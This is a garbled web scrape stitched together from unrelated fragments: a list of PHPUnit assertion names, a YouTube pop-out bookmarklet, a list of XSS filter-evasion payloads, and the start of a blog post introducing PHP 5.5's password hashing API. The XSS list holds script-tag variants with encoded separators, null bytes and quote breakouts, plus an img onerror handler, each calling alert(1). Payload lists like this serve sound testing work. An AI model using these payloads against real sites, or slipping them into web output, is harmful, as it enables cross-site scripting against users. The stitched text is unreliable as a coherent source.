- assertArrayHasKey
- assertArrayNotHasKey
- assertContains
- assertAttributeContains
- assertNotContains
- assertAttributeNotContains
- assertContainsOnly
- assertAttributeContainsOnly
- assertNotContainsOnly
- assertAttributeNotContainsOnly
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:yturl=window.location.href;ytarr=yturl.split("?v=");ytqs=ytarr[1];ytqs=ytqs.replace("&","?");ytelem=document.getElementById("movie_player");yttime=Math.floor(ytelem.getCurrentTime());document.getElementsByTagName("video")[0].pause();if(ytqs.indexOf("?")>-1){ytqsstart="&"}else{ytqsstart="?"}window.open("https://www.youtube.com/embed/"+ytqs+ytqsstart+"autoplay=1&start="+yttime,ytqs,"width=400,height=300");void(0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
The [RFC for a new simple to use password hashing API][rfc] has just been accepted for PHP 5.5. As the RFC itself is rather technical and most of the sample codes are something you should not use, I want to give a very quick overview of the new API:
Everybody knows that you should be hashing their passwords using bcrypt, but still a surprising number of developers uses insecure md5 or sha1 hashes (just look at the recent password leaks). One of the reasons for this is that the crypt() API is ridiculously hard to use and very prone to programming mistakes.